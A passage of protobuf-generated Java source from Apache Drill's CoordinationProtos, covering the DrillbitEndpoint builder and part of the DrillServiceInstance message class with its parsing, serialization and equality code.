return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
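    // The Builder accumulates field values plus a bitField0_ presence mask; build()
    // validates the result and buildPartial() copies both the values and the presence
    // bits into an immutable DrillbitEndpoint instance.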
/**
* Protobuf type {@code exec.DrillbitEndpoint}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:exec.DrillbitEndpoint)
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.class, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder.class);
}
// Construct using org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
getRolesFieldBuilder();
}
}
@java.lang.Override
public Builder clear() {
super.clear();
address_ = "";
bitField0_ = (bitField0_ & ~0x00000001);
userPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000002);
controlPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000004);
dataPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000008);
if (rolesBuilder_ == null) {
roles_ = null;
} else {
rolesBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000010);
version_ = "";
bitField0_ = (bitField0_ & ~0x00000020);
state_ = 0;
bitField0_ = (bitField0_ & ~0x00000040);
httpPort_ = 0;
bitField0_ = (bitField0_ & ~0x00000080);
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_descriptor;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getDefaultInstanceForType() {
return org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance();
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint build() {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
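      // buildPartial() translates the builder's presence bits (from_bitField0_) into the
      // message's bits (to_bitField0_) and copies each set field; the nested roles message
      // is taken from rolesBuilder_ when a field builder has been created, otherwise from
      // the roles_ reference held directly by this builder.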
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint buildPartial() {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint result = new org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) != 0)) {
to_bitField0_ |= 0x00000001;
}
result.address_ = address_;
if (((from_bitField0_ & 0x00000002) != 0)) {
result.userPort_ = userPort_;
to_bitField0_ |= 0x00000002;
}
if (((from_bitField0_ & 0x00000004) != 0)) {
result.controlPort_ = controlPort_;
to_bitField0_ |= 0x00000004;
}
if (((from_bitField0_ & 0x00000008) != 0)) {
result.dataPort_ = dataPort_;
to_bitField0_ |= 0x00000008;
}
if (((from_bitField0_ & 0x00000010) != 0)) {
if (rolesBuilder_ == null) {
result.roles_ = roles_;
} else {
result.roles_ = rolesBuilder_.build();
}
to_bitField0_ |= 0x00000010;
}
if (((from_bitField0_ & 0x00000020) != 0)) {
to_bitField0_ |= 0x00000020;
}
result.version_ = version_;
if (((from_bitField0_ & 0x00000040) != 0)) {
to_bitField0_ |= 0x00000040;
}
result.state_ = state_;
if (((from_bitField0_ & 0x00000080) != 0)) {
result.httpPort_ = httpPort_;
to_bitField0_ |= 0x00000080;
}
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint) {
return mergeFrom((org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint other) {
if (other == org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance()) return this;
if (other.hasAddress()) {
bitField0_ |= 0x00000001;
address_ = other.address_;
onChanged();
}
if (other.hasUserPort()) {
setUserPort(other.getUserPort());
}
if (other.hasControlPort()) {
setControlPort(other.getControlPort());
}
if (other.hasDataPort()) {
setDataPort(other.getDataPort());
}
if (other.hasRoles()) {
mergeRoles(other.getRoles());
}
if (other.hasVersion()) {
bitField0_ |= 0x00000020;
version_ = other.version_;
onChanged();
}
if (other.hasState()) {
setState(other.getState());
}
if (other.hasHttpPort()) {
setHttpPort(other.getHttpPort());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
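      // bitField0_ presence layout for this message (one bit per optional field):
      //   0x01 address, 0x02 user_port, 0x04 control_port, 0x08 data_port,
      //   0x10 roles,   0x20 version,   0x40 state,        0x80 http_port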
private int bitField0_;
private java.lang.Object address_ = "";
/**
* <code>optional string address = 1;</code>
* @return Whether the address field is set.
*/
public boolean hasAddress() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string address = 1;</code>
* @return The address.
*/
public java.lang.String getAddress() {
java.lang.Object ref = address_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
address_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string address = 1;</code>
* @return The bytes for address.
*/
public com.google.protobuf.ByteString
getAddressBytes() {
java.lang.Object ref = address_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
address_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string address = 1;</code>
* @param value The address to set.
* @return This builder for chaining.
*/
public Builder setAddress(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
address_ = value;
onChanged();
return this;
}
/**
* <code>optional string address = 1;</code>
* @return This builder for chaining.
*/
public Builder clearAddress() {
bitField0_ = (bitField0_ & ~0x00000001);
address_ = getDefaultInstance().getAddress();
onChanged();
return this;
}
/**
* <code>optional string address = 1;</code>
* @param value The bytes for address to set.
* @return This builder for chaining.
*/
public Builder setAddressBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
address_ = value;
onChanged();
return this;
}
private int userPort_ ;
/**
* <code>optional int32 user_port = 2;</code>
* @return Whether the userPort field is set.
*/
public boolean hasUserPort() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int32 user_port = 2;</code>
* @return The userPort.
*/
public int getUserPort() {
return userPort_;
}
/**
* <code>optional int32 user_port = 2;</code>
* @param value The userPort to set.
* @return This builder for chaining.
*/
public Builder setUserPort(int value) {
bitField0_ |= 0x00000002;
userPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 user_port = 2;</code>
* @return This builder for chaining.
*/
public Builder clearUserPort() {
bitField0_ = (bitField0_ & ~0x00000002);
userPort_ = 0;
onChanged();
return this;
}
private int controlPort_ ;
/**
* <code>optional int32 control_port = 3;</code>
* @return Whether the controlPort field is set.
*/
public boolean hasControlPort() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional int32 control_port = 3;</code>
* @return The controlPort.
*/
public int getControlPort() {
return controlPort_;
}
/**
* <code>optional int32 control_port = 3;</code>
* @param value The controlPort to set.
* @return This builder for chaining.
*/
public Builder setControlPort(int value) {
bitField0_ |= 0x00000004;
controlPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 control_port = 3;</code>
* @return This builder for chaining.
*/
public Builder clearControlPort() {
bitField0_ = (bitField0_ & ~0x00000004);
controlPort_ = 0;
onChanged();
return this;
}
private int dataPort_ ;
/**
* <code>optional int32 data_port = 4;</code>
* @return Whether the dataPort field is set.
*/
public boolean hasDataPort() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional int32 data_port = 4;</code>
* @return The dataPort.
*/
public int getDataPort() {
return dataPort_;
}
/**
* <code>optional int32 data_port = 4;</code>
* @param value The dataPort to set.
* @return This builder for chaining.
*/
public Builder setDataPort(int value) {
bitField0_ |= 0x00000008;
dataPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 data_port = 4;</code>
* @return This builder for chaining.
*/
public Builder clearDataPort() {
bitField0_ = (bitField0_ & ~0x00000008);
dataPort_ = 0;
onChanged();
return this;
}
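      // The nested roles field is managed either directly through roles_ or, once
      // getRolesFieldBuilder() has been called, through a SingleFieldBuilderV3 that keeps
      // the child Roles builder in sync with this parent builder.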
private org.apache.drill.exec.proto.CoordinationProtos.Roles roles_;
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.Roles, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder, org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder> rolesBuilder_;
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return Whether the roles field is set.
*/
public boolean hasRoles() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return The roles.
*/
public org.apache.drill.exec.proto.CoordinationProtos.Roles getRoles() {
if (rolesBuilder_ == null) {
return roles_ == null ? org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
} else {
return rolesBuilder_.getMessage();
}
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder setRoles(org.apache.drill.exec.proto.CoordinationProtos.Roles value) {
if (rolesBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
roles_ = value;
onChanged();
} else {
rolesBuilder_.setMessage(value);
}
bitField0_ |= 0x00000010;
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder setRoles(
org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder builderForValue) {
if (rolesBuilder_ == null) {
roles_ = builderForValue.build();
onChanged();
} else {
rolesBuilder_.setMessage(builderForValue.build());
}
bitField0_ |= 0x00000010;
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder mergeRoles(org.apache.drill.exec.proto.CoordinationProtos.Roles value) {
if (rolesBuilder_ == null) {
if (((bitField0_ & 0x00000010) != 0) &&
roles_ != null &&
roles_ != org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance()) {
roles_ =
org.apache.drill.exec.proto.CoordinationProtos.Roles.newBuilder(roles_).mergeFrom(value).buildPartial();
} else {
roles_ = value;
}
onChanged();
} else {
rolesBuilder_.mergeFrom(value);
}
bitField0_ |= 0x00000010;
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public Builder clearRoles() {
if (rolesBuilder_ == null) {
roles_ = null;
onChanged();
} else {
rolesBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000010);
return this;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder getRolesBuilder() {
bitField0_ |= 0x00000010;
onChanged();
return getRolesFieldBuilder().getBuilder();
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder getRolesOrBuilder() {
if (rolesBuilder_ != null) {
return rolesBuilder_.getMessageOrBuilder();
} else {
return roles_ == null ?
org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
}
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.Roles, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder, org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder>
getRolesFieldBuilder() {
if (rolesBuilder_ == null) {
rolesBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.Roles, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder, org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder>(
getRoles(),
getParentForChildren(),
isClean());
roles_ = null;
}
return rolesBuilder_;
}
private java.lang.Object version_ = "";
/**
* <code>optional string version = 6;</code>
* @return Whether the version field is set.
*/
public boolean hasVersion() {
return ((bitField0_ & 0x00000020) != 0);
}
/**
* <code>optional string version = 6;</code>
* @return The version.
*/
public java.lang.String getVersion() {
java.lang.Object ref = version_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
version_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string version = 6;</code>
* @return The bytes for version.
*/
public com.google.protobuf.ByteString
getVersionBytes() {
java.lang.Object ref = version_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
version_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string version = 6;</code>
* @param value The version to set.
* @return This builder for chaining.
*/
public Builder setVersion(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000020;
version_ = value;
onChanged();
return this;
}
/**
* <code>optional string version = 6;</code>
* @return This builder for chaining.
*/
public Builder clearVersion() {
bitField0_ = (bitField0_ & ~0x00000020);
version_ = getDefaultInstance().getVersion();
onChanged();
return this;
}
/**
* <code>optional string version = 6;</code>
* @param value The bytes for version to set.
* @return This builder for chaining.
*/
public Builder setVersionBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000020;
version_ = value;
onChanged();
return this;
}
private int state_ = 0;
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return Whether the state field is set.
*/
public boolean hasState() {
return ((bitField0_ & 0x00000040) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return The state.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State getState() {
@SuppressWarnings("deprecation")
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State result = org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.valueOf(state_);
return result == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.STARTUP : result;
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @param value The state to set.
* @return This builder for chaining.
*/
public Builder setState(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000040;
state_ = value.getNumber();
onChanged();
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return This builder for chaining.
*/
public Builder clearState() {
bitField0_ = (bitField0_ & ~0x00000040);
state_ = 0;
onChanged();
return this;
}
private int httpPort_ ;
/**
* <code>optional int32 http_port = 8;</code>
* @return Whether the httpPort field is set.
*/
public boolean hasHttpPort() {
return ((bitField0_ & 0x00000080) != 0);
}
/**
* <code>optional int32 http_port = 8;</code>
* @return The httpPort.
*/
public int getHttpPort() {
return httpPort_;
}
/**
* <code>optional int32 http_port = 8;</code>
* @param value The httpPort to set.
* @return This builder for chaining.
*/
public Builder setHttpPort(int value) {
bitField0_ |= 0x00000080;
httpPort_ = value;
onChanged();
return this;
}
/**
* <code>optional int32 http_port = 8;</code>
* @return This builder for chaining.
*/
public Builder clearHttpPort() {
bitField0_ = (bitField0_ & ~0x00000080);
httpPort_ = 0;
onChanged();
return this;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:exec.DrillbitEndpoint)
}
// @@protoc_insertion_point(class_scope:exec.DrillbitEndpoint)
private static final org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint();
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getDefaultInstance() {
return DEFAULT_INSTANCE;
}
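    // The public PARSER field is emitted with @Deprecated by the code generator; callers
    // are expected to go through parser() or the static parseFrom overloads instead.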
@java.lang.Deprecated public static final com.google.protobuf.Parser<DrillbitEndpoint>
PARSER = new com.google.protobuf.AbstractParser<DrillbitEndpoint>() {
@java.lang.Override
public DrillbitEndpoint parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new DrillbitEndpoint(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<DrillbitEndpoint> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<DrillbitEndpoint> getParserForType() {
return PARSER;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
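  // DrillServiceInstance pairs a DrillbitEndpoint with a string id and a registration
  // timestamp (registrationTimeUTC is an int64; the unit is not stated in the schema
  // reflected by this generated code).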
public interface DrillServiceInstanceOrBuilder extends
// @@protoc_insertion_point(interface_extends:exec.DrillServiceInstance)
com.google.protobuf.MessageOrBuilder {
/**
* <code>optional string id = 1;</code>
* @return Whether the id field is set.
*/
boolean hasId();
/**
* <code>optional string id = 1;</code>
* @return The id.
*/
java.lang.String getId();
/**
* <code>optional string id = 1;</code>
* @return The bytes for id.
*/
com.google.protobuf.ByteString
getIdBytes();
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return Whether the registrationTimeUTC field is set.
*/
boolean hasRegistrationTimeUTC();
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return The registrationTimeUTC.
*/
long getRegistrationTimeUTC();
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return Whether the endpoint field is set.
*/
boolean hasEndpoint();
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return The endpoint.
*/
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getEndpoint();
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder getEndpointOrBuilder();
}
/**
* Protobuf type {@code exec.DrillServiceInstance}
*/
public static final class DrillServiceInstance extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:exec.DrillServiceInstance)
DrillServiceInstanceOrBuilder {
private static final long serialVersionUID = 0L;
// Use DrillServiceInstance.newBuilder() to construct.
private DrillServiceInstance(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private DrillServiceInstance() {
id_ = "";
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new DrillServiceInstance();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
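    // Wire-format note: each tag read below is (field_number << 3) | wire_type, so
    // 10 = field 1 length-delimited (id), 16 = field 2 varint (registrationTimeUTC),
    // 26 = field 3 length-delimited (endpoint).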
private DrillServiceInstance(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 10: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000001;
id_ = bs;
break;
}
case 16: {
bitField0_ |= 0x00000002;
registrationTimeUTC_ = input.readInt64();
break;
}
case 26: {
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder subBuilder = null;
if (((bitField0_ & 0x00000004) != 0)) {
subBuilder = endpoint_.toBuilder();
}
endpoint_ = input.readMessage(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.PARSER, extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(endpoint_);
endpoint_ = subBuilder.buildPartial();
}
bitField0_ |= 0x00000004;
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.class, org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.Builder.class);
}
private int bitField0_;
public static final int ID_FIELD_NUMBER = 1;
private volatile java.lang.Object id_;
/**
* <code>optional string id = 1;</code>
* @return Whether the id field is set.
*/
public boolean hasId() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string id = 1;</code>
* @return The id.
*/
public java.lang.String getId() {
java.lang.Object ref = id_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
id_ = s;
}
return s;
}
}
/**
* <code>optional string id = 1;</code>
* @return The bytes for id.
*/
public com.google.protobuf.ByteString
getIdBytes() {
java.lang.Object ref = id_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
id_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int REGISTRATIONTIMEUTC_FIELD_NUMBER = 2;
private long registrationTimeUTC_;
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return Whether the registrationTimeUTC field is set.
*/
public boolean hasRegistrationTimeUTC() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return The registrationTimeUTC.
*/
public long getRegistrationTimeUTC() {
return registrationTimeUTC_;
}
public static final int ENDPOINT_FIELD_NUMBER = 3;
private org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint endpoint_;
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return Whether the endpoint field is set.
*/
public boolean hasEndpoint() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return The endpoint.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getEndpoint() {
return endpoint_ == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder getEndpointOrBuilder() {
return endpoint_ == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (((bitField0_ & 0x00000001) != 0)) {
com.google.protobuf.GeneratedMessageV3.writeString(output, 1, id_);
}
if (((bitField0_ & 0x00000002) != 0)) {
output.writeInt64(2, registrationTimeUTC_);
}
if (((bitField0_ & 0x00000004) != 0)) {
output.writeMessage(3, getEndpoint());
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) != 0)) {
size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, id_);
}
if (((bitField0_ & 0x00000002) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt64Size(2, registrationTimeUTC_);
}
if (((bitField0_ & 0x00000004) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(3, getEndpoint());
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance)) {
return super.equals(obj);
}
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance other = (org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance) obj;
if (hasId() != other.hasId()) return false;
if (hasId()) {
if (!getId()
.equals(other.getId())) return false;
}
if (hasRegistrationTimeUTC() != other.hasRegistrationTimeUTC()) return false;
if (hasRegistrationTimeUTC()) {
if (getRegistrationTimeUTC()
!= other.getRegistrationTimeUTC()) return false;
}
if (hasEndpoint() != other.hasEndpoint()) return false;
if (hasEndpoint()) {
if (!getEndpoint()
.equals(other.getEndpoint())) return false;
}
